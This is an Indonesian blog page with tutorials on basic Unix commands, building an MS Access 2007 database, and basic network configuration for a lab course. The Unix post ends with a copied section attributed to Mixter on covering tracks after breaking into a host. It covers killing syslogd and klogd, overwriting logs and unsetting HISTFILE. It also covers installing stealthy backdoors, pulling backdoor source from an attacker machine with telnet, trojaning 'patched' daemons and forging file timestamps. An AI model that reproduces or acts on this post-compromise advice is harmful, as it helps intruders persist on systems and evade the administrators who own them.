Featured Article
Latest Post

20.11.12

Menyusun truntur Jaringan Wan


14.11.12

DASAR DASAR PERINTAH UNIX
Sumber korido-crew.tk :
Berikut ini merupakan beberapa perintah pada Unix yang saya ambil dari forum tetangga.
Pada berbagai Clone Unix (BSD,Linux,Sunos,System V,SCO,IRIX,AIX) hampir
mempunyai persamaan satu sama lain nya. Sebagai Contoh saya berikan Cara
menjalankan perintah Linux ini sebagian saya ambil dari tutorial Kecoak Elektronik dan
Perintah Jitu dari HAcker Israel yaitu Mixter
:: Tutorial CyberBug
PERINTAH-PERINTAH UNIX
Sebelum lanjut perlu diingat bahwa di Linux/UNIX semua perintah ditulis dalam huruf
kecil,dan Linux/UNIX membedakan huruf besar dan kecil.
------> ls
Ingat perintah DIR di DOS? ... nah perintah ini sama dgn DIR, gunanya untuk
menampilkan 'list' file di dalam directory. Perintah ls juga dilengkapi dengan flag
tambahan yang bisa di lihat dengan mengetik :
ls --help ; menampilkan bantuan
man ls ; man bisa juga diartikan manual, jadi manual ls
Beberapa perintah ls yang umum adalah :
ls -l ; menampilkan informasi tambahan (l = long)
ls -a ; menampilkan hidden file (a = attribute)
ls -la
Informasi tambahan yang ditampilkan oleh flag -l menyangkut user yang memiliki
'owns', file tanggal dan jam file itu dibuat, hak/permissions file, dan informasi lain,
contoh :
rwxr-x--x
Catatan :
karakter 1-3: user/owner permissions
karakter 4-6: group permissions
karakter 7-8: other permissions
This is what the letters mean:
r - read, permissions utk 'baca'
w - write, permission utk 'tulis'
x - (e)xecute, permission utk 'menjalankan'
Jadi pada contoh diatas :
user/owner dapat read/baca, write/tulis dan execute/jalankan file yg satu group dgn
user/owner dpt read/baca, execute/jalankan file user lain dapat execute/menjalankan file
tsb - berarti permission tidak ada, jika ada d sebelum permission berarti itu adalah
directory
------> cat
Cat atau concatenate dipakai untuk menampilkan dan menulis/membuat file, kira-kira
sama dengan perintah TYPE di DOS. Untuk menampilkan isi file ketik : "cat " Untuk
membuat file ketik : "cat > " ketik isi file dan utk menyimpan tekan CTRL + C atau
CTRL + D kalau namafile sudah ada file tersebut akan ditimpa, jika kita ingin data
ditambahkan kefile yang sudah ada ganti > dengan >>
------> more
Menampilkan isi dari file, perlayar, tekan q untuk quit more jilid1.txt
------> grep
Menampilkan semua baris yang mengandung pola yang diinginkan grep kecoak jilid1.txt
akan menampilkan semua baris teks yang mengandung kecoak di file jilid1.txt
------> man
UNIX help/manual, ketik : man untuk eksekusi. man pwd
------> echo
echo dipakai utk menampilkan apa yang kita ketik di layar, seperti :
echo "saya belajar linux"
saya belajar linux
atau untuk membuat file, seperti :
echo "biff n" > .profile
yang akan membuat file .profile di directory aktif yg berisi teks "biff n" atau menambah
file isi file dgn mengganti > dengan >>
------> cp
copy, dipakai untuk mengcopy file.
cp jilid1.txt jilid1.txt.backup
cp jilid1.txt ~cyberbug/backup/jilid1.txt.backup
------> mv
move, mengganti nama file atau directory
mv jilid1.txt jilid1a.txt
mv backup bak
------> rm
remove, hapus file
rm jilid1.txt ; hapus file jilid1.txt
rm * ; hapus semua file di directory aktif (hati-hati!)
------> cd
change directory, dipakai untuk pindah directory, sama dengan perintah CD di DOS
cd /root
perhatikan bahwa di Linux yang digunakan adalah / (slash) bukan \ (backslash)
------> mkdir
make directory, membuat directory
mkdir backup
------> rmdir
remove directory, hapus directory, file-file dalam directory harus dihapus dulu sebelum
menghapus directory.
rmdir backup
------> who
who digunakan untuk menampilkan user yang login ke system, hasilnya kira-kira sebagai
berikut :
cyberservices:~$ who
root tty1 Dec 20 17:47
cyberbug tty2 Dec 20 17:48
cyberbug tty3 Dec 20 17:48
cyberbug ttyp0 Dec 20 18:43 (localhost)
Kolom pertama menunjukkan nama user yang login, kolom kedua menunjukkan terminal
line yang digunakan, kolom ketiga menunjukkan waktu login dan kolom keempat
menunjukkan domain atau IP asal mereka koneksi, jika kosong berarti mereka main
langsung dari console.
------> whoami
Kalo lupa diri ini perintahnya : Siapakah Aku?
cyberservices:~$ whoami
cyberbug
------> who am i
Ini juga kalo sudah lupa daratan )
cyberservices:~$ who am i
cyberservices!cyberbug tty3 Dec 20 17:48
------> pwd
Tampilkan directory aktif, pwd = print working directory, perintah yang dipakai kalo saat
jalan2, sudah gak tau mo pulang lewat mana
cyberservices:~$ pwd
/home/cyberbug
------> ps
Menampilkan proses yang aktif
cyberservices:~$ ps
PID TTY STAT TIME COMMAND
87 2 S 0:00 -bash
88 3 S 0:00 -bash
1440 2 S 0:00 pico jilid2.txt
1443 3 R 0:00 ps
------> ping
Mengecek host apakah 'up' utk istilah teknisnya silakan 'man ping'
cyberservices:~$ ping localhost
PING localhost (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.2 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.1 ms
--- localhost ping statistics ---
5 packets transmitted, 5 packets received, 0% packet loss round-trip min/avg/max =
0.1/0.1/0.2 ms
cyberservices:~$ ping 127.0.0.1
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.2 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.1 ms
--- 127.0.0.1 ping statistics ---
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 0.1/0.1/0.2 ms
cyberservices:~$
Perhatikan bahwa localhost dan 127.0.0.1 adalah sama
127.0.0.1 adalah local loopback yang disediakan untuk testing.
------> finger
Mencari informasi user
cyberservices:~$ finger
Login Name Tty Idle Login Time Office Office Phone
cyberbug CyberBug 2 Dec 22 01:10
cyberbug CyberBug 3 Dec 22 01:10
root 1 1:37 Dec 22 01:10
cyberservices:~$ finger @cyberservices.com
[cyberservices.com]
Welcome to Linux version 2.0.34 at cyberservices.com !
3:46am up 2:37, 3 users, load average: 0.00, 0.00, 0.00
Login Name Tty Idle Login Time Office Office Phone
cyberbug CyberBug 2 Dec 22 01:10
cyberbug CyberBug 3 Dec 22 01:10
root 1 1:39 Dec 22 01:10
cyberservices:~$ finger @localhost
[localhost]
Welcome to Linux version 2.0.34 at cyberservices.com !
3:47am up 2:38, 3 users, load average: 0.00, 0.00, 0.00
Login Name Tty Idle Login Time Office Office Phone
cyberbug CyberBug 2 Dec 22 01:10
cyberbug CyberBug 3 Dec 22 01:10
root 1 1:40 Dec 22 01:10
cyberservices:~$ finger cyberbug
Login: cyberbug Name: CyberBug
Directory: /home/cyberbug Shell: /bin/bash
On since Tue Dec 22 01:10 (PHT) on tty2 8 seconds idle
On since Tue Dec 22 01:10 (PHT) on tty3
Last login Tue Dec 22 01:13 (PHT) on tty4
Mail forwarded to "|IFS=' '&&exec /usr/bin/procmail -f-||exit 75
#cyberbug"
No mail.
No Plan.
cyberservices:~$ finger root
Login: root Name:
Directory: /root Shell: /bin/bash
On since Tue Dec 22 01:10 (PHT) on tty1 1 hour 42 minutes idle
Mail last read Tue Dec 15 09:19 1998 (PHT)
No Plan.
------> telnet
Melakukan komunikasi dengan host lain melalui telnet protocol
cyberservices:~$ telnet localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Welcome to Linux 2.0.34.
cyberservices login: cyberbug
Password: 3m4nggu3p1k1r1n
Linux 2.0.34.
Last login: Tue Dec 22 01:13:52 on tty4.
No mail.
cyberservices:~$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 cyberservices.com ESMTP Sendmail 8.9.0/8.9.0; Tue, 22 Dec 1998
03:52:51 +0800
helo darling
250 cyberservices.com Hello cyberbug@localhost [127.0.0.1], pleased to
meet you
mail from: guest@cyberservices.com
250 guest@cyberservices.com... Sender ok
rcpt to: untukmu@seorang.jauh.disana
250 untukmu@seorang.jauh.disana... Recipient ok (will queue)
data
354 Enter mail, end with "." on a line by itself
Kukirim lagu dan salam rinduku .
250 EAA01615 Message accepted for delivery quit
cyberservices:~$ telnet localhost 110
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'. +OK cyberservices POP3 Server (Version 1.005l) ready at
user root
+OK please send PASS command pass 3m4nggu3p1k1r1n
+OK 2 messages ready for root in /usr/spool/mail/root stat
+OK 2 7227
retr 1
quit
------> ftp
Menggunakan file tranfer program
cyberservices:~$ ftp localhost
Connected to localhost.
220 cyberservices.com FTP server (Version wu-2.4.2-academ[BETA-15](1) Wed May
20 13:45:04 CDT 1998) ready.
Name (localhost:cyberbug): ftp
331 Guest login ok, send your complete e-mail address as password.
Password: cyberbug@k-elektronik.org
230-Welcome, archive user! ... blah blah ... blah
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ftp juga bisa dilakukan dengan melakukan telnet ke port 21
cyberservices:~$ telnet localhost 21
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 cyberservices.com FTP server (Version wu-2.4.2-academ[BETA-15](1) Wed May
20 13:45:04 CDT 1998) ready.
------> talk
Berbicara dengan user lain, misalnya cyberbug request talk ke root sbb:
talk root
atau
talk root@cyberservices.com
[Waiting for your party to respond]
[Ringing your party again]
Di terminal root akan muncul pesan :
Message from Talk_Daemon@cyberservices at 4:00 ...
talk: connection requested by cyberbug@localhost.
talk: respond with: talk cyberbug@localhost
root harus mengetik talk cyberbug@localhost jika ingin menjawab request
talk cyberbug@localhost
[Connection established]
:: Perintah Tambahan dari Saya ( r3v0lt aka Intruded)
1. Perintah Untuk Kompilasi File
ex. #gcc -o namafile filekompilasi
#gcc -o pscan pscan.c
2. Perintah Running file eksekusi
ex. #./file
#./pscan
#./scaner.pl
#./scanner.sh
3. Perintah Hentikan proses
ex.# Ctrl+c
4. Perintah Proses sementara
ex.#ctrl+z ,balik ke shell ketik fg (pada FreeBSD)
5. Perintah ganti Shell (pada FreeBSD)
ex.#chsh ---> ksh,bash,tcsh
6. Perintah Ganti Passwd
ex.#passwd
7. Perintah melihat ip suatu host
ex.#dig ip
ex.#nslookup ip
8. Perintah editor
ex.#pico wepedodol.c
9. perintah pipa, dua proses sekaligus
ex.# ls -al |head file
akan menanmpilakn direktori bagian atas nya saja
10.perintah ganti mode
ex.#chmod +x file
r - read, permissions utk 'baca'
w - write, permission utk 'tulis'
x - (e)xecute, permission utk 'menjalankan'
:: Begitu aja dolo yaaa ok say.....
::: Keterangan Lae Kita Mixter =
Here are my suggestions...
1. killall -9 syslogd klogd - pesky loggers! only few admins will notice if they get turned
off. Now you can act freely. copy secure.1 and messages.1 from /var/log over secure and
messages Normally, these logs are the only ones with the intruders IP and traces of a root
compromise in them. If *.1 doesn't exist, truncate the files. Also, unset HISTFILE is
important. Nobody does unset HISTFILE, thus leaving a .bash_history in /var/named or
even /. Very unprofessional .
2. uname -a, w, last -10, cat /etc/passwd /etc/inetd.conf... Inform yourself about the
frequency the system is being maintained, administrated, if the logfiles are being
analyzed.
* Look how many people have access to it (/etc/passwd) - the more the better for you
(keeps attention away from you).
* Look if the system is already backdoored!! you might want to remove other backdoors.
* Look for a loghost or snmp (dangerous because you cant manipulate the logs on a faraway
loghost). Watch out for *logd, sniffers, netmon's etc before you do anything great
on the host. If you are paranoid, traceroute the host, and see if non-routers are before that
host (probably IDS, loghost, sniffer, etc).
3. This is important: DONT MANIPULATE THE SYSTEM CONFIGURATION! DOH!
It is too easy to detect you if you add yourself to /etc/passwd, or open a port by
manipulating inetd.conf. Let me tell you that root kits and /bin/login trojans are the first
things any sane admin will watch for. Install a nice stealthy port backdoor. My approach
to uploading files is doing:
(on your box)
$ uuencode -m backdoor.c backdoor.c | less
(on the target box)
uudecode
# cc -o backdoor backdoor.c
A nice different method is putting a daemon on your own box, on port 666, that spits out
the source code when someone telnets to it, so you can do telnet ppp-42.haxor.net 666 >
backdoor.c As I said, make sure you can get back in. If the box you rooted has an uptime
of more than 300 days or so, you might consider not installing the backdoor for startup.
Instead, kill the vulnerable daemon, and when the host restarts, come back using an
exploit. Normally, you can replace a lame daemon that nobody uses with your backdoor.
Look at inetd.conf to see what daemons are active. A safe bet is in.talkd which often is
activated but seldom ever used. So, when you want to re-activate your backdoor, talk
root@0wned.host.com for a second, and your backdoor is running. You can also add
/path/to/backdoor to /root/.profile.. but it is a bit riskier than the inetd backdoor method.
4. Subscribe to bugtraq, CIAC security list, or look at rootshell, to see what you need to
do to patch your buggy stuff. If RPM is installed you can try a rpm -U
ftp://ftp.cdrom.com/rightdir/daemon.rpm If not, use ncftp to fetch the file anonymously,
because it doesn't need user interaction. If you want, add an additional backdoor in your
"patched" server. QPOP 2.53 even supports this itself. For all files you replace, you
should modify the time stamps, which wont help, if the admin uses tripwire or cksum, but
if the admin is, like most admins, a complete lamer that does find / -ctime to scan for
trojans and thinks he knows his job. To modify timestamps, you do a simple:
touch -r /bin/bash /path/to/your/trojan
this will copy the exact date/time info from /bin/bash over your freshly added trojan.
Voila! The alternative to all this for lazy people is, to add a ipfwadm rule that prevents
traffic from the outside (-W eth0) to the ports with the buggy daemons, and adding that
command to a rc.d script as well. Bind doesn't need tcp port 53 for anything except zone
transfers and the RoTShB/ADM bind exploits. It works fine with 53/tcp firewalled. But
be aware that this might get you detected, lets say if you disable port 110 or 143 on an
ISP's central mail exchange server...
About your backdoor:
Port > 10000 is strongly recommended, also a backdoor using UDP, ICMP, or even
something as unusual as raw IP is very useful. People that bind /bin/sh to a port are idiots,
because they open that host to everyone, letting in sniffers, and probably other people
who may damage the host seriously. Make sure to password protect everything that runs
as root. A password of a minimum length of 8 characters, because you have no way of
detecting a brute force attack. For the C programmers, let me say, listen(sockfd,1).
Maybe 2 connections, but not more.
For comfortability, you can add some stuff you want to occur on each successful
backdoor login, like system("w"), system("killall -9 syslogd klogd"), or whatever. If you
want a front-end backdoor with some integrated functions, try gateway[5].
Salinan Korido Crew
Sumber :
Korido-crew.tk

7.11.12

Membuat Database menggunakan Microsoft Office Access 2007

Di sini saya akan menshare bagaimana cara membuat database menggunakan Microsoft Office Access 2007. Articale ini saya tulis karena saya mendapatkan tugas dari Dosen saya, 
sekalian tambah & update postingan my blog
sebelumnya,  taukah anda, apa itu Database ???????? 
adalah kumpulan informasi yang disimpan di dalam komputer secara sistematik sehingga dapat diperiksa menggunakan suatu program komputer untuk memperoleh informasi dari basis data tersebut.

1. Pastikan ms office sudah anda install 
2.  Pilih Ms access 2007
3. Setelah anda open Ms access tadi, pilih blink database



4. kemudia akan tampil tampilan

5. Kemudian buka file name tadi seperti gambar di atas, akan muncul form lagi
buat folder kemudian pilih format file(mdb). karena nantinya kita akan menghubungkan access dengan Delphi(Postingan selanjutnya). setalah sudah di pilih tinggal klik ok
6. Pilih Create
7. Pilih table1, klik kanan pilih design view isi nama table: misalnya (club)
8.  kemudian isi table dengan berapa field yang anda inginkan, misalnya seperti ini
9. Di sini saya menggunakan 7 field (no, arsenal, Real Madrid, Chelsea, Barcalona, MU, Valencia). ganti field sizenya pada field Properties sesuai Keingginan anda
10.  Klik table (club) pilih open Isi Field dengan bebera Record
11. kemudian Save. liat hasilnya di mana anda menyimpan file tersebut.
12. Selesai .
di sini anda sudahmempunyai database nama - nama fans dari beberapa club

5.6.12

Konfigurasi Jaringan Dasar

Dan Perintah Dasar Jaringan Untuk Troubleshooting


TUJUAN PEMBELAJARAN:
1.        Mahasiswa mampu menggunakan tools jaringan yang ada.
2.        Mahasiswa memahami perintah – perintah dasar konfigurasi jaringan
3.        Mahasiswa memahami konsep layering

PERALATAN YANG DIBUTUHKAN
1.      Beberapa PC yang akan dihubungkan dalam jaringan.
2.      Hub sebagai penghubung jaringan.
3.      Kabel jaringan secukupnya.

DASAR TEORI
Jaringan komputer adalah kumpulan dua atau lebih dari komputer yang saling berhubungan satu sama lain. Kebutuhan yang diperlukan dalam koneksi jaringan :
1.      Koneksi secara fisik (Topologi secara fisik)
2.      Koneksi secara Logis (Topologi secara Logic)

Beberapa jenis/tipe koneksi secara fisik yang dikenal menggunakan tipe bus, star, ring dan lain-lain. Sedangkan topologi secara logik jaringan merupakan aturan supaya perangkat jaringan bisa saling berkomunikasi, salah satunya pengalamatan setiap komputer yang ada di jaringan, biasa disebut dengan IP Address.

IP Address
Untuk  terhubung  pada  suatu  jaringan  diperlukan  pengalamatan yang unik di setiap komputer yang terhubung, pengalamatan ditandai dengan penomoran  dari  Internet  Protocol  yang  ada  pada   PC   tersebut.   Teknik   penomoran   IP   ada   2   yaitu   manual   dan   otomatis   (DHCP).

Pada suatu jaringan diperlukan IP dan netmask, contoh: 192.168.0.1/255.255.255.0 
192.168.0.1 adalah penomoran IP, sedangkan 255.255.255.0 adalah netmask      dari      jaringan
tersebut.  IP  memiliki  beberapa  class  yang  terbagi  menurut  jumlah  IP  tersebut.  Class  yang
ada antara lain:
A. 10.x.x.x dengan netmask 255.0.0.0 
B. 172.16.x.x s/d 172.31.x.x dengan netmask 255.255.0.0 
C. 192.168.0.x s/d 192.168.255.x dengan netmask 255.255.255.0 
D dan E tidak digunakan, karena diperuntukan untuk penelitian

Setting static ip di linux
  1. Perintah “ifconfig” 

  1. Dengan menyimpan konfigurasi jaringan
·         Pada Debian GNU/Linux, file konfigurasi jaringan terdapat pada  /etc/network/interfaces,
·         dapat dilakukan dengan menggunakan editor vim, nano, atau mcedit.
·         # vim /etc/network/interfaces
·         pada file tersebut ketikkan syntax berikut:
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
address 10.252.108.143 netmask 255.255.255.0
·         simpan perubahan tersebut
·         kemudian jalankan perintah “/etc/init.d/networking restart”

Setting dinamic ip di linux
  1. Dengan menggunakan perintah dhclient
  2. Dengan merubah konfigurasi di /etc/network/interfaces
·         # vim /etc/network/interfaces
·         pada file tersebut ketikkan syntax berikut:
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet dhcp
·         simpan perubahan tersebut
·         kemudian jalankan perintah “/etc/init.d/networking restart”


Ada beberapa command pada linux yang dipakai untuk melakukan  konfigurasi dan troubleshooting jaringan :
1.      lspci
Merupakan tools yang berada pada layer 1, dipakai untuk mengecek apakah interface jaringannya sudah terpasang atau belum. Apabila ditemukan Network controller atau Ethernel controller, artinya perangkat jaringan sudah siap digunakan.
2.      mii-tool
Untuk melihat apakah linknya sudah ada atau belum
3.      dmesg | grep eth
Untuk mengecek ethernet card ada apa belum
4.      arp
Merupakan tools yang dipakai untuk melihat alamat NIC dari komputer yang terkoneksi secara langsung dengan kita.

5.      ifconfig
Command yang dipakai untuk melihat interface dan alamat yang diberikan ke interface tersebut
6.      route
Memeriksa tabel routing, menambah dan menghapus tabel routing
7.      ping
Memeriksa koneksi dengan protokol ICMP
8.      traceroute
Memeriksa tahapan koneksi
9.      mtr
Command gabungan ping dan traceroute
10.  netconfig
Command untuk konfigurasi ip secara permanen

11.  Netstat
Untuk mengetahui port berapa saja yang terbuka untuk koneksi pada PC

TUGAS PENDAHULUAN
Jelaskan cara penggunaan command dibawah ini beserta option yang digunakan dan artinya

1.      lspci
2.      mii-tool
3.      arp
4.      ifconfig
5.      route
6.      ping
7.      traceroute
8.      mtr
9.      netstat
10.  netconfig


PERCOBAAN
Memakai Tools Troubleshooting di jaringan
1.      Jalankan perintah “dmesg | grep eth”, catat dan analisa hasilnya. Jika tidak ada keluaran konfirmasikan ke dosen/asisten praktikum.
2.      Lepaskan kabel jaringan, lakukan perintah mii-tool
3.      Pasangkan lagi kabel jaringan dan lakukan perintah mii-tool
4.      Catat hasil dari perintah “lspci” sebelum dan sesudah melepas kabel
5.      jalankan perintah ”arp –a” dan catat hasilnya , buka beberap terminal baru lagi dan jalankan perintah ”ping no_ip_tujuan” ke beberapa komputer sebelah (tanya nomor IP tersebut ke teman). Pada terminal pertama lakukan perintah arp –a sekali lagi . Catat hasilnya dan bandingkan dengan hasil arp yang pertama, analisa hasilnya
6.      Jalankan perintah ”ifconfig”, catat hasilnya.
7.      Jalankan perintah route –n, catat hasilnya.
8.      Pastikan anda terhubung ke internet, mintalah tolong ke dosen/asisten praktikum jika belum bisa terhubung ke internet.
9.      Jalankan perintah ”traceroute” dan ”mtr” ke :
Catat hasilnya
10.  Buka halaman http://www.eepis-its.edu dengan web browser, kemudian sebelum koneksi selesai, buka terminal dan catat hasil koneksi dengan perintah “netstat -natu”
11.  Jalankan perintah netconfig, isikan data berikut ip: 192.168.1.xx (xx mulai 1-254, koordinasikan dengan teman anda agar tidak ada yang memakai nomor yang anda ambil. Isikan juga netmask :255.255.255.0 yang lain dikosongi terlebih dahulu dan tekan tombol OK.
12.  Selanjutnya jalankan perintah ifconfig catat hasilnya. Bandingkan dengan ketika anda menjalankan perintah ifconfig pada nomor 6, apa hasilnya ?
13.  Jalankan perintah netstat, catat hasilnya

Konfigurasi IP Address di Jaringan
1.      Login ke komputer Linux masing-masing user : student password : student
2.      Selanjutnya login ke root dengan menjalankan command su pada terminal dengan password 123456

3.      Cek apakah kabel sudah terkoneksi ke komputer masing-masing, jalankan command mii-tool, jika sudah terkoneksi terdapat hasil sbb :


3. Lihat no IP komputer masing-masing menggunakan perintah ifconfig, catat hasilnya


4          Ganti IP dari masing-masing komputer menjadi network 172.16.x.x/255.255.0.0 tidak boleh ada yg sama :
a.       Lakukan dengan perintah “ifconfig”

b.      Lakukan dengan mengedit di file /etc/network/interfaces 


c.       Selesai melakukan edit di file /etc/network/interfaces  lakukan perintah restart dengan menjalankan perintah /etc/init.d/networking restart

5          Lakukan cek koneksi dengan menggunakan perintah ping no_ip_tujuan pada masingmasing PC di jaringan, tuliskan hasilnya pada laporan 
6          Rubah setting IP tersebut menjadi DHCP menggunakan perintah dhclient. Dan catat kembali hasil no_IP setelah menjalankan dhclient.
7          Bagi peserta praktikum menjadi beberapa kelompok dimana 1 kelompok memiliki 5 keanggotaan. Kemudian setting PC yang ada dengan list IP beikut ini:
•   192.168.15.x/255.255.255.0 
•   192.168.16.x/255.255.255.0  
•   192.168.17.x/255.255.255.0
•   192.168.18.x/255.255.255.0
•   192.168.19.x/255.255.255.0
•   192.168.20.x/255.255.255.0
Kemudian lakukan ping ke semua IP diatas, dan catat hasilnya di laporan, Mana bisa koneksi dengan komputer mana ?

Followers